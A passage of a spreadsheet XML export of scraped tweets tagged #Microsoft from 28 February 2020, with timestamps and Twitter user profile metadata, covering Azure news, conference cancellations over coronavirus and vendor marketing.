    <t>#Microsoft Azure DevOps Services to require TLS 1.2 https://t.co/aZW1zTHBId  the disablement of TLS 1.0 and TLS 1.1 is on March 31, 2020. #Azure #AzureDevOps #TLS #Security #Code #Pipelines #DevOps #Developers via @chungjustin https://t.co/vZGJoAAnL4</t>
  </si>
  <si>
    <t>Fri Feb 28 08:36:59 +0000 2020</t>
  </si>
  <si>
    <t>Autonomous Robots from #Microsoft #Autonomous #Robots https://t.co/o581ZrWUHn</t>
  </si>
  <si>
    <t>{'id': 1233277768101658624, 'id_str': '1233277768101658624', 'name': '10print20goto10', 'screen_name': '10print20goto10', 'location': 'Derby, UK', 'description': 'Application Developer focusing on the Microsoft stack. Always learning. Current focus: automation and robotics #microsoft #appdev #code #developer #automation', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 53, 'listed_count': 0, 'created_at': 'Fri Feb 28 06:28:47 +0000 2020', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1233316649706672130/7VcWy3kA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233316649706672130/7VcWy3kA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233277768101658624/1582893350',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</si>
  <si>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08:35:19 +0000 2020</t>
  </si>
  <si>
    <t>PowerPoint allows you to work with other people in a collaborative manner. This is especially useful in office settings where teamwork is key. 
#velvotng #microsoft #Nigeria #CoronavirusOutbreak #MUFC
#coronavirusnigeria #DianeAt24 https://t.co/hnix0e5oCP</t>
  </si>
  <si>
    <t>Fri Feb 28 08:32:17 +0000 2020</t>
  </si>
  <si>
    <t>I'm really into totally free iPad right now #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 08:25:32 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook cancels #F8, pulls out of #GameDevelopersConference, together with #Sony, #Microsoft https://t.co/cUqYZa2Yfp</t>
  </si>
  <si>
    <t>{'id': 80596373, 'id_str': '80596373', 'name': 'Telecompaper', 'screen_name': 'Telecompaper', 'location': '', 'description': 'Telecompaper delivers all the latest news for telecom professionals around the world, plus in-depth market commentary and research.', 'url': 'http://t.co/oehBtS7n7u', 'entities': {'url': {'urls': [{'url': 'http://t.co/oehBtS7n7u', 'expanded_url': 'http://www.telecompaper.com', 'display_url': 'telecompaper.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6185, 'friends_count': 657, 'listed_count': 339, 'created_at': 'Wed Oct 07 14:56:29 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15381, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B2DFDA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2240524287/logo_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2240524287/logo_normal.gif', 'profile_link_color': '93A644',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</si>
  <si>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08:25:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft team coined a new term Azure logic apps..., we describe the rest. Click to know. https://t.co/6NYCnTNoZ4 #developer #logicapps #Microsoft #MicrosoftDevelopmentServices #Programming #appdev #MobileAppDevelopmentCompany #MobileApps #Androidapps #Appdevelopmentcompany</t>
  </si>
  <si>
    <t>{'id': 1067367358082109440, 'id_str': '1067367358082109440', 'name': 'Atman Rathod', 'screen_name': 'RathodAtman', 'location': 'Ahmadabad City, India', 'description': 'Atman Rathod with 13+ years of experience is working as the Business Director at CMARIX TechnoLabs, a leading web and mobile app development company.', 'url': 'https://t.co/hP3KjkMtIo', 'entities': {'url': {'urls': [{'url': 'https://t.co/hP3KjkMtIo', 'expanded_url': 'https://www.cmarix.com/', 'display_url': 'cmarix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2929, 'friends_count': 2995, 'listed_count': 19, 'created_at': 'Tue Nov 27 10:39:43 +0000 2018', 'favourites_count': 631, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1745, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1067369304956448768/5-e9yhtd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067369304956448768/5-e9yhtd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1067367358082109440/1547892652',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</si>
  <si>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08:21:28 +0000 2020</t>
  </si>
  <si>
    <t>Dedicated to @Microsoft @Azure, the European Azure Conference [Nice,2-4 June 2020]. Developers, IT Pros, Cloud Professionals this is a must for your calendar
https://t.co/d6l7uB2ggM
@EuropeanSP
@valointranet
@Office365
#IT #Cloud
#Conference
#CloudComputing 
#Microsoft #Azure</t>
  </si>
  <si>
    <t>{'id': 4885563333, 'id_str': '4885563333', 'name': 'Ungoti', 'screen_name': 'Ungoti', 'location': 'Madrid, Spain', 'description': 'Advancing the #UserAdoption, #DigitalWorkplace, software development, #O365, #SharePoint, #EmployeeExperience, #IT\nWe connect people, vision and technology.', 'url': 'https://t.co/D0w0G9plE2', 'entities': {'url': {'urls': [{'url': 'https://t.co/D0w0G9plE2', 'expanded_url': 'https://ungoti.com', 'display_url': 'ungoti.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 775, 'friends_count': 639, 'listed_count': 275, 'created_at': 'Sun Feb 07 19:40:02 +0000 2016', 'favourites_count': 3929, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2568,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'http://pbs.twimg.com/profile_images/1158464649605582848/Gv4WBgYJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158464649605582848/Gv4WBgYJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4885563333/1564781993', 'profile_link_color': '630054',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</si>
  <si>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08:15:13 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 08:15:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has announced its plans for its upcoming #Wave1 2020 release for April which provides greater details in terms of the new &amp;amp; improved features coming to #Dynamics365 &amp;amp; the #PowerPlatform. Why not read our blog to find out more? https://t.co/PFj2gZJef3 https://t.co/PSs9IVirFT</t>
  </si>
  <si>
    <t>Fri Feb 28 08:12:07 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/jdKBP8rYFn</t>
  </si>
  <si>
    <t>{'id': 2867068668, 'id_str': '2867068668', 'name': 'Hitachi Solutions India', 'screen_name': 'HitachiSolIndia', 'location': 'India | Middle East', 'description': 'Hitachi Solutions India has one of the sizeable and growing Microsoft Dynamics Practice, focusing solely on the implementation of Microsoft Dynamics 365.', 'url': 'https://t.co/ewhn6D5aAM', 'entities': {'url': {'urls': [{'url': 'https://t.co/ewhn6D5aAM', 'expanded_url': 'http://india.hitachi-solutions.com/', 'display_url': 'india.hitachi-solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 355, 'friends_count': 476, 'listed_count': 13, 'created_at': 'Mon Oct 20 12:33:54 +0000 2014', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 501,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'http://pbs.twimg.com/profile_images/1151018781331771392/jNfapvxa_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151018781331771392/jNfapvxa_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2867068668/1563259298',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</si>
  <si>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08:08:38 +0000 2020</t>
  </si>
  <si>
    <t>@KultureGeekFr: #Google Earth maintenant disponible sur #Firefox, #Microsoft Edge et Opera  https://t.co/lUgv3fMs7q https://t.co/B6HsjWfquB</t>
  </si>
  <si>
    <t>{'id': 2831256824, 'id_str': '2831256824', 'name': 'Christophe Poulain', 'screen_name': 'stevelumia', 'location': 'Saint Macaire', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 73, 'listed_count': 92, 'created_at': 'Thu Sep 25 06:15:20 +0000 2014', 'favourites_count': 1519, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 53281,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'http://pbs.twimg.com/profile_images/1224592860927922176/r3dG6fme_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224592860927922176/r3dG6fme_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2831256824/1580801127', 'profile_link_color': '0084B4',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</si>
  <si>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Fri Feb 28 08:07:23 +0000 2020</t>
  </si>
  <si>
    <t>MSFTMechanics: The new #AzureMigrate experience, centralizing large-scale migration for servers, databases, applications and virtual desktops. Click the link to watch the full video: https://t.co/jX0nLozbnN #Microsoft #Azure #VMs #database #Cloud #MSIgn... https://t.co/7U8gCgUXG1</t>
  </si>
  <si>
    <t>Fri Feb 28 08:04:13 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Phil-Data Business Systems, Inc. can accelerate your journey with #Microsoft #Azure. https://t.co/qIFkws1NiP #PhilData #Di... https://t.co/3sw5lETCU4</t>
  </si>
  <si>
    <t>{'id': 198433775, 'id_str': '198433775', 'name': 'LM', 'screen_name': 'leylordtm', 'location': 'Makati City / Imus Cavite', 'description': 'Marketing Management Professional â–ªï¸Ž Certiï¬ed Digital Marketerâ–ªï¸ŽDriving Digital Transformation', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 159, 'friends_count': 754, 'listed_count': 13, 'created_at': 'Mon Oct 04 09:01:39 +0000 2010', 'favourites_count': 333, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4705,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'http://pbs.twimg.com/profile_images/727753626643476480/qpvgQyxr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/727753626643476480/qpvgQyxr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/198433775/1384319075',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</si>
  <si>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Fri Feb 28 08:02:52 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels GDC 2020 Attendance due to coronavirus concerns https://t.co/CDTFxR6R8a #microsoft #COVID2019 #CoronavirusOutbreak #GDC2020 #GDC #coronavirus</t>
  </si>
  <si>
    <t>Fri Feb 28 08:02:39 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft https://t.co/NDwe9i4Uh7</t>
  </si>
  <si>
    <t>{'id': 86175581, 'id_str': '86175581', 'name': 'Cipca Ileana', 'screen_name': 'IleanaCipca', 'location': 'Bucharest, BucureÅŸti', 'description': 'Passionate about life, with good and bad.   Partner Channel Marketing Manager - @Microsoft  My tweets are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 546, 'friends_count': 1914, 'listed_count': 112, 'created_at': 'Thu Oct 29 22:13:57 +0000 2009', 'favourites_count': 110, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2046,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'http://pbs.twimg.com/profile_images/433691681422966784/QKmujtA__normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/433691681422966784/QKmujtA__normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86175581/1473251921',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</si>
  <si>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08:02:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels GDC 2020 Attendance due to coronavirus concerns https://t.co/1ZRlqHDAdG #microsoft #COVID2019 #CoronavirusOutbreak #GDC2020 #GDC #coronavirus</t>
  </si>
  <si>
    <t>Fri Feb 28 08:01:45 +0000 2020</t>
  </si>
  <si>
    <t>I gave a talk about #serverless #microservices Architecture in practice @Azure_Berlin User group in #berlin.What a great community and nice people.Thank you everyone who participated.#Microsoft #azure #meetup @AzureFunctions https://t.co/w94kCSQz9M</t>
  </si>
  <si>
    <t>{'id': 66482947, 'id_str': '66482947', 'name': 'Ehsan Amini', 'screen_name': 'ehsannamini', 'location': 'Germany', 'description': 'âš¡ï¸Senior software Engineer @HitachiSolutionsDEâš¡ï¸| speaker, author, coder | run Cloud user group NÃ¼rnberg | Opinions are my own. #Azure #Serverless', 'url': 'https://t.co/LCiCHjVPwd', 'entities': {'url': {'urls': [{'url': 'https://t.co/LCiCHjVPwd', 'expanded_url': 'http://www.ehsanamini.com', 'display_url': 'ehsanamini.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 184, 'friends_count': 475, 'listed_count': 11, 'created_at': 'Mon Aug 17 20:54:17 +0000 2009', 'favourites_count': 3865, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1190,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'http://pbs.twimg.com/profile_images/1231528317460897792/AGP4P04N_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231528317460897792/AGP4P04N_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66482947/1563396377',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</si>
  <si>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08:01:11 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Phil-Data Business Systems, Inc. can accelerate your journey with #Microsoft #Azure. https://t.co/LI7jxa18CA</t>
  </si>
  <si>
    <t>{'id': 910841075853488129, 'id_str': '910841075853488129', 'name': 'Phil-Data Business Systems, Inc.', 'screen_name': '1phildata', 'location': 'Makati City', 'description': 'Phil-Data is one of the most trusted names in the IT industry that offers integrated &amp; efficient IT solutions that answer your business needs', 'url': 'https://t.co/l8Ya7zihog', 'entities': {'url': {'urls': [{'url': 'https://t.co/l8Ya7zihog', 'expanded_url': 'http://www.phildata.com/', 'display_url': 'phildata.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 202, 'friends_count': 1048, 'listed_count': 4, 'created_at': 'Thu Sep 21 12:20:09 +0000 2017', 'favourites_count': 347, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5797,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'http://pbs.twimg.com/profile_images/911110241554538496/NZlIhFD-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/911110241554538496/NZlIhFD-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/910841075853488129/1570117571',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</si>
  <si>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08:00:48 +0000 2020</t>
  </si>
  <si>
    <t>A year ago we published "Why Quicksteps in Outlook will have you Dancing" https://t.co/SSv871uOTJ #Timesavingtips #Microsoft #Quicksteps https://t.co/bHHFZ46ZwT</t>
  </si>
  <si>
    <t>Fri Feb 28 08:00:29 +0000 2020</t>
  </si>
  <si>
    <t>Were so proud of our ASR tool. Look how it compares to similar tools from #Google, #Amazon and #Microsoft. 
ASR optimises Call Centres: 
- Fast review or analysis of call data 
- Fast transcribing (reduces human error) 
- Brand protection, compliance and training https://t.co/rKJauJD138</t>
  </si>
  <si>
    <t>{'id': 1067394514837491712, 'id_str': '1067394514837491712', 'name': 'ImpacTech', 'screen_name': 'ImpacTechLtd', 'location': 'Cyprus', 'description': 'Enhance the customer experience using our AI-driven software and be the best part of the customer journey. #ImpactCRM #ImpactAI #ImpactTelecom #ImpactPSPGateway', 'url': 'https://t.co/mbjfvWSbJI', 'entities': {'url': {'urls': [{'url': 'https://t.co/mbjfvWSbJI', 'expanded_url': 'https://www.impactechs.com', 'display_url': 'impactechs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 434, 'friends_count': 1558, 'listed_count': 3, 'created_at': 'Tue Nov 27 12:27:38 +0000 2018', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 186,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'http://pbs.twimg.com/profile_images/1067396054721671173/OXcxiT82_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067396054721671173/OXcxiT82_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1067394514837491712/1543322098',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</si>
  <si>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08:00:28 +0000 2020</t>
  </si>
  <si>
    <t>#Google, #Amazon and #Microsoft give input to new health #AI standard #appsmgt #healthcare
https://t.co/nEHV18UlDR https://t.co/NTR3fCQkRg</t>
  </si>
  <si>
    <t>Fri Feb 28 07:59:56 +0000 2020</t>
  </si>
  <si>
    <t>Sometimes you need to make  difficult decisions in your life... 
#Microsoft #MicrosoftLife https://t.co/SOlc1AneLr</t>
  </si>
  <si>
    <t>Fri Feb 28 07:58:45 +0000 2020</t>
  </si>
  <si>
    <t>Also last preparations today for this one https://t.co/WsFVfbivIB  #EnvisionFSI #Microsoft #Finance https://t.co/zdfbefZdMV</t>
  </si>
  <si>
    <t>{'id': 22830567, 'id_str': '22830567', 'name': 'Liselotte Isacsson', 'screen_name': 'liselotte_w_i', 'location': 'Capital of Sweden', 'description': 'Make Change Happen. Marknadsstrateg som vill inspirera. inspirational.se', 'url': 'https://t.co/hq6WXEcF6B', 'entities': {'url': {'urls': [{'url': 'https://t.co/hq6WXEcF6B', 'expanded_url': 'http://inspirational.se/', 'display_url': 'inspirational.se', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 977, 'friends_count': 1035, 'listed_count': 45, 'created_at': 'Wed Mar 04 20:41:43 +0000 2009', 'favourites_count': 1430, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5443,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'http://pbs.twimg.com/profile_images/701069332726550528/JC9QPKit_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/701069332726550528/JC9QPKit_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22830567/1457365378',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</si>
  <si>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07:58:23 +0000 2020</t>
  </si>
  <si>
    <t>Been waiting for this : #Microsoft to soon reveal #Universal #Print, a cloud-based print infrastructure service that eliminates Print Servers - https://t.co/IY2PU5wfiG</t>
  </si>
  <si>
    <t>{'id': 58493681, 'id_str': '58493681', 'name': 'Atle Vatland', 'screen_name': 'atlevatland', 'location': 'Norway', 'description': '', 'url': 'http://t.co/uhK5Cm30X3', 'entities': {'url': {'urls': [{'url': 'http://t.co/uhK5Cm30X3', 'expanded_url': 'http://www.vatland.no', 'display_url': 'vatland.no', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 102, 'listed_count': 8, 'created_at': 'Mon Jul 20 14:58:33 +0000 2009', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1311,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'http://pbs.twimg.com/profile_images/1498098862/atle_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1498098862/atle_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58493681/1438323218',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</si>
  <si>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07:56:45 +0000 2020</t>
  </si>
  <si>
    <t>Last preparations for this today https://t.co/gXREtEakTJ  #IndustrialTransformation #Microsoft #manufacturing https://t.co/TsoF4inhgP</t>
  </si>
  <si>
    <t>Fri Feb 28 07:47:59 +0000 2020</t>
  </si>
  <si>
    <t>All you need to know about Azure generation 2 VMS
#Microsoft #Azure #IaaS #VM #AzOps #AzureFamily #Cloud  https://t.co/lLmGOfxaX0</t>
  </si>
  <si>
    <t>Fri Feb 28 07:45:15 +0000 2020</t>
  </si>
  <si>
    <t>A Guide: How To Master #Microsoft .Net Training 
#Asp.training  #MicrosoftDotNet #Certifications 
Read More: https://t.co/t9uGfU1mmM https://t.co/nYRurdfE8a</t>
  </si>
  <si>
    <t>{'id': 1043114870223163392, 'id_str': '1043114870223163392', 'name': 'Raj Negi', 'screen_name': 'cetpatraining', 'location': 'Sector 16, Noida', 'description': 'IT Training Course or Industrial Training or Winter Training with live Project.For more detail about IT Courses 9212172602.', 'url': 'https://t.co/YjFJZnxbhJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/YjFJZnxbhJ', 'expanded_url': 'https://www.cetpainfotech.com/', 'display_url': 'cetpainfotech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 56, 'listed_count': 0, 'created_at': 'Fri Sep 21 12:28:59 +0000 2018', 'favourites_count': 800, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1792, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1177806946016972800/y86U9Bem_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177806946016972800/y86U9Bem_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1043114870223163392/1577194793',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</si>
  <si>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07:44:24 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery: A Secure Way to Migrate Windows Server 2008 to Azure
With support cycle coming to an end, users of Windows Server 2008 have option to migrate to Microsoft Azure.  #windowsserver #server2008 #microsoft #azure #microsoftazure
https://t.co/urCSYdK872 https://t.co/8RfII4QaDX</t>
  </si>
  <si>
    <t>Fri Feb 28 07:41:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft , the American multinational technology company fears it might miss its quarterly revenue outlook due to the ongoing coronavirus which is affecting manufacturing in China. After the announcement the companys shares lost 7.05% https://t.co/M59VFb3vMu
#StockNews</t>
  </si>
  <si>
    <t>{'id': 2464536967, 'id_str': '2464536967', 'name': 'TradersAsset', 'screen_name': 'TradersAsset', 'location': '', 'description': 'Thoughts, opinions and insights on Forex and Binary Options Trading from our in-house team.', 'url': 'http://t.co/SaU6H295Hw', 'entities': {'url': {'urls': [{'url': 'http://t.co/SaU6H295Hw', 'expanded_url': 'http://www.tradersasset.com', 'display_url': 'tradersasset.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 194, 'friends_count': 253, 'listed_count': 22, 'created_at': 'Sat Apr 26 11:54:48 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1464,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'http://pbs.twimg.com/profile_images/467035983058186240/NZRZ1tr1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/467035983058186240/NZRZ1tr1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2464536967/1409569869',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</si>
  <si>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07:38:41 +0000 2020</t>
  </si>
  <si>
    <t>How to Fix Slow Image Loading in Windows 7/8 Photo Viewer
https://t.co/L5KsE0t8FI
#windows7 #windows8 #Microsoft #photoviewer</t>
  </si>
  <si>
    <t>{'id': 773490905617539072, 'id_str': '773490905617539072', 'name': 'Nguyá»…n Báº£o Ngá»c', 'screen_name': 'vansubinhan', 'location': 'Singapore', 'description': 'Hiá»n vá»›i Bá»¥t, khÃ´ng hiá»n vá»›i ma.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Wed Sep 07 11:59:37 +0000 2016', 'favourites_count': 68, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 243,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'http://pbs.twimg.com/profile_images/1223294093394006016/tX-TZUBp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223294093394006016/tX-TZUBp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/773490905617539072/1546441936', 'profile_link_color': 'FF4700',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</si>
  <si>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07:38:25 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook said it would cancel its annual developer conference and #Microsoft withdrew from a gaming conference.</t>
  </si>
  <si>
    <t>{'id': 20044440, 'id_str': '20044440', 'name': 'Eddie Du', 'screen_name': 'Edourdoo', 'location': 'Shanghai, China', 'description': "News Junkie; åœ°å‘½æµ·å¿ƒ; ç†ä¸­å®¢; China's diplomacy; History; Empires and Peoples; Ideology, Religion and Politics; Tech, Gadgets; Memes and viral stuff. Views personal.", 'url': 'https://t.co/cbpDE6XQ7G', 'entities': {'url': {'urls': [{'url': 'https://t.co/cbpDE6XQ7G', 'expanded_url': 'https://www.quora.com/Eddie-Doo', 'display_url': 'quora.com/Eddie-Doo', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15133, 'friends_count': 2573, 'listed_count': 519, 'created_at': 'Wed Feb 04 10:56:22 +0000 2009', 'favourites_count': 12399, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 467951, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4A913C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000669568751/56adc18070e25792ea98d90fad615383_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000669568751/56adc18070e25792ea98d90fad615383_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20044440/1557475296', 'profile_link_color': 'FAB81E',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'regular'}</t>
  </si>
  <si>
    <t>Fri Feb 28 07:38:04 +0000 2020</t>
  </si>
  <si>
    <t>Indian research firm Convergence Catalyst is ready for its second act https://t.co/ef5v0jBIHz #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 07:36:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft engineer swindles $10M using his admin credentials to sensitive systems.
#Cyber #Cybersecurity #Infosec #Hacking 
https://t.co/GNd5rSPhp6</t>
  </si>
  <si>
    <t>{'id': 934668655039627264, 'id_str': '934668655039627264', 'name': 'â˜¢ï¸ z3r0id â˜¢ï¸', 'screen_name': 'z3r0id', 'location': '127.0.0.1', 'description': 'âš¡Knowledge driven, Caffeine fueled.âš¡\n\n\n#Hacker | #Sysadmin | #Consultant | #Entrepreneur | #FamilyMan \n\nClimb that damn mountain. ðŸ¤˜', 'url': 'https://t.co/faN997uo59', 'entities': {'url': {'urls': [{'url': 'https://t.co/faN997uo59', 'expanded_url': 'https://chambersloaded.com', 'display_url': 'chambersloaded.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 453, 'friends_count': 1049, 'listed_count': 7, 'created_at': 'Sun Nov 26 06:22:27 +0000 2017', 'favourites_count': 424, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 622, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231468719143915521/4M6_DnRe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231468719143915521/4M6_DnRe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934668655039627264/1582439997',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</si>
  <si>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07:28:29 +0000 2020</t>
  </si>
  <si>
    <t>3 Technology Events, 3 Beautiful Cities, 1 Day!
@ranosys is all set to create history tomorrow! Join us for Magento Meetup in #Jaipur, OutSystems Education Program in #Bikaner &amp;amp; Microsoft Power Platforms Workshop in #Pune.
#Magento #Microsoft #OutSystemsPartner #MagentoPartner https://t.co/bbKWHQB2wt</t>
  </si>
  <si>
    <t>{'id': 55847537, 'id_str': '55847537', 'name': 'Ranosys Technologies', 'screen_name': 'ranosys', 'location': 'Singapore', 'description': '', 'url': 'http://t.co/4pVfILPl9E', 'entities': {'url': {'urls': [{'url': 'http://t.co/4pVfILPl9E', 'expanded_url': 'http://www.ranosys.com', 'display_url': 'ranosys.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 852, 'friends_count': 4463, 'listed_count': 4, 'created_at': 'Sat Jul 11 14:57:53 +0000 2009', 'favourites_count': 2438, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2179,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'http://pbs.twimg.com/profile_images/1003508507700649985/5ItHJ5yY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1003508507700649985/5ItHJ5yY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/55847537/1559021700',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</si>
  <si>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07:25:56 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/LUkDAIyfii #Nintendo #Xbox #Playstation #Twitch #Mixer #Microsoft #Gamer #GamerGirl #seraph7studios BE THE CHANGE YOU WANT TO SEE IN THE... https://t.co/AkEfjFrUEd</t>
  </si>
  <si>
    <t>Fri Feb 28 07:23:58 +0000 2020</t>
  </si>
  <si>
    <t>The latest The Microsoft Azure Daily! https://t.co/pdCJjMysfm Thanks to @MSTCommunity @donnie_taylor @codeproject #azure #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 07:23:55 +0000 2020</t>
  </si>
  <si>
    <t>What is the role of MSBI Developer?
#Microsoft #BusinessIntelligence #Developer #MSBI
#DelhiViolance 
